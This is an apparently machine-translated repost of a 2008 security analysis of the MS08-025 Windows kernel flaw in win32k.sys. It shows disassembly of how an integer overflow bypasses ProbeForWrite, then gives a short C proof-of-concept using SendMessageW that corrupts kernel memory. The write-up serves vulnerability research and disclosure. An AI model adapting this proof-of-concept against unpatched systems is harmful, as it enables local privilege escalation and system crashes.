Windows kernel vulnerability ms08025 analysis-vulnerability warning-the black bar safety net

2008-04-13T00:00:00
ID MYHACK58:62200818793
Type myhack58
Reporter 佚名
Modified 2008-04-13T00:00:00

Description

Source:security focus Author: Polymorphours Email: Polymorphours@whitecell.org Homepage:http://www.whitecell.org Date: 2008-04-10

After internal discussion, it was decided to publish the analysis results.

4 on No. 8, microsoft again released a kernel patch(KB941693), Microsoft the vulnerability is described as: this security update addresses in the Windows kernel that a secret Reported vulnerabilities. Successful exploitation of the vulnerability a local attacker can completely control the affected System. An attacker could then install programs; view, change, or delete data; or create New account. This is for Windows 2 0 0 0, Windows XP, Windows Server 2 0 0 3, the Windows Vista and Windows Server 2 0 0 8 in all supported versions of important safety Update. This security update by modifying the Windows kernel validates from the user mode to pass over the Input the way to solve this vulnerability.

From this description we see that this vulnerability is very broad, from 2 to 0 0 0 to 2 0 0 8 The. In order to Can see this vulnerability in detail, I analyzed the ms08-0 2 5 patch, found the vulnerability exists in win32k.sys module. In this patch, patched win32k. sys in multiple places, which In the problem the place is very interesting, because the overflow register to bypass ProbeForWrite The function of the user layer coming from the pointer of the check, below we will from NtUserfnOUTSTRING The function in question to expand our analysis(my analysis of the platform is winxp sp2)

. text:BF86FB04 ; int stdcall NtUserfnOUTSTRING(int,int,int,PVOID Address,int,int,int) . text:BF86FB04 stdcall NtUserfnOUTSTRING(x, x, x, x, x, x, x) proc near . text:BF86FB04 ; CODE XREF: xxxDefWindowProc(x,x,x,x)+6Ep . text:BF86FB04 ; NtUserMessageCall(x,x,x,x,x,x,x)+61p . text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x)-Ep . text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x)+6Dp . text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x)-4Bp . text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x)+60p ... . text:BF86FB04 . text:BF86FB04 var_24 = dword ptr-24h . text:BF86FB04 var_20 = dword ptr-20h . text:BF86FB04 UserBuffer = dword ptr-1Ch . text:BF86FB04 ms_exc = CPPEH_RECORD ptr-18h . text:BF86FB04 arg_0 = dword ptr 8 . text:BF86FB04 arg_4 = dword ptr 0Ch . text:BF86FB04 arg_8 = dword ptr 10h . text:BF86FB04 Address = dword ptr 14h . text:BF86FB04 arg_10 = dword ptr 18h . text:BF86FB04 arg_14 = dword ptr 1Ch . text:BF86FB04 arg_18 = dword ptr 20h . text:BF86FB04 . text:BF86FB04 ; FUNCTION CHUNK AT . text:BF86FAE1 SIZE 0000001E BYTES . text:BF86FB04 . text:BF86FB04 push 14h . text:BF86FB06 push offset unk_BF98D250 . text:BF86FB0B call __SEH_prolog . text:BF86FB0B . text:BF86FB10 xor edx, edx . text:BF86FB12 mov [ebp+ms_exc. disabled], edx . text:BF86FB15 mov eax, [ebp+var_20] . text:BF86FB18 mov ecx, 7FFFFFFFh . text:BF86FB1D and eax, ecx . text:BF86FB1F mov esi, [ebp+arg_18] . text:BF86FB22 shl esi, 1Fh . text:BF86FB25 or eax, esi . text:BF86FB27 mov [ebp+var_20], eax . text:BF86FB2A mov esi, eax . text:BF86FB2C xor esi, [ebp+arg_8] -> esi = buffer length . text:BF86FB2F and esi, ecx . text:BF86FB31 xor eax, esi . text:BF86FB33 mov [ebp+var_20], eax . text:BF86FB36 cmp [ebp+arg_18], edx -> if it is the ansi way would be checked directly, otherwise you need to calculate unicode of size . text:BF86FB39 jnz short loc_BF86FB47 . text:BF86FB39 . text:BF86FB3B lea esi, [eax+eax] <- note that here, the problem here is, in this case eax = unicode string length, <- when eax = 0x80000000 when eax + eax = 0x100000000, the 3 2-bit registers < a- is spilled, esi = 0 . text:BF86FB3E xor esi, eax . text:BF86FB40 and esi, ecx . text:BF86FB42 xor eax, esi . text:BF86FB44 mov [ebp+var_20], eax -> save unicode space occupied by the . text:BF86FB44 . text:BF86FB47 . text:BF86FB47 loc_BF86FB47: ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x)+35j . text:BF86FB47 mov [ebp+var_24], edx . text:BF86FB4A mov esi, [ebp+Address] . text:BF86FB4D mov [ebp+UserBuffer], esi . text:BF86FB50 xor ebx, ebx . text:BF86FB52 inc ebx . text:BF86FB53 push ebx ; Alignment . text:BF86FB54 and eax, ecx . text:BF86FB56 push eax ; Length <- since eax = 0, so ProbeForWrite be bypassed . text:BF86FB57 push esi ; Address . text:BF86FB58 call ds:ProbeForWrite(x,x,x)

bf80a1b0 e96ef4ffff jmp win32k! xxxRealDefWindowProc+0x1235 (bf809623) bf80a1b5 d1e8 shr eax,1 bf80a1b7 8 9 4 5 1 0 mov [ebp+0x10],eax bf80a1ba ebf1 jmp win32k! xxxRealDefWindowProc+0x190 (bf80a1ad) bf80a1bc 8b4514 mov eax,[ebp+0x14] bf80a1bf f6400780 test byte ptr [eax+0x7],0x80 bf80a1c3 8b4008 mov eax,[eax+0x8] bf80a1c6 7 4 0 8 jz win32k! xxxRealDefWindowProc+0x105 (bf80a1d0) bf80a1c8 c60000 mov byte ptr [eax],0x0 bf80a1cb e951f4ffff jmp win32k! xxxRealDefWindowProc+0x1225 (bf809621) bf80a1d0 6 6 8 9 1 0 mov [eax],dx <- here, on the front of the incoming of the pointer to 2-byte write operation, the write data is 0 bf80a1d3 e949f4ffff jmp win32k! xxxRealDefWindowProc+0x1225 (bf809621) bf80a1d86a00 push 0x0 bf80a1da 6a02 push 0x2 bf80a1dc ff7638 push dword ptr [esi+0x38] bf80a1df e8d1690200 call win32k! BuildHwndList (bf830bb5) bf80a1e4 8bf8 mov edi,eax bf80a1e6 85ff test edi,edi bf80a1e8 0f8433f4ffff je win32k! xxxRealDefWindowProc+0x1225 (bf809621) bf80a1ee 8d7710 lea esi,[edi+0x10]

So how to trigger this vulnerability, I also analyzed user32.dll and win32k! NtUserMessageCall, the Found trigger this vulnerability is very simple, only need to call SendMessageW sends a WM_GETTEXT message to be able to trigger, Below is the poc code(note, the modified code is run after the kernel has written unmapped memory, it will direct to blue screen to be changed can be With the exploit, you can refer to my previous exploit)

include <stdio. h>

include <windows. h>

int main(int argc,char *argv[]) { DWORD dwHookAddress = 0x80000000;

printf( "\tMS08-0 2 5 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" ); printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\n" );

SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress ); return 0; }

WSS(Whitecell Security Systems), a non-profit folk art organization, is committed to a variety of system security technology research. Stick to the traditional hacker Spirit, the pursuit of the art of fine pure. WSS home page:<http://www.whitecell.org/> WSS Forum:<http://www.whitecell.org/forums/>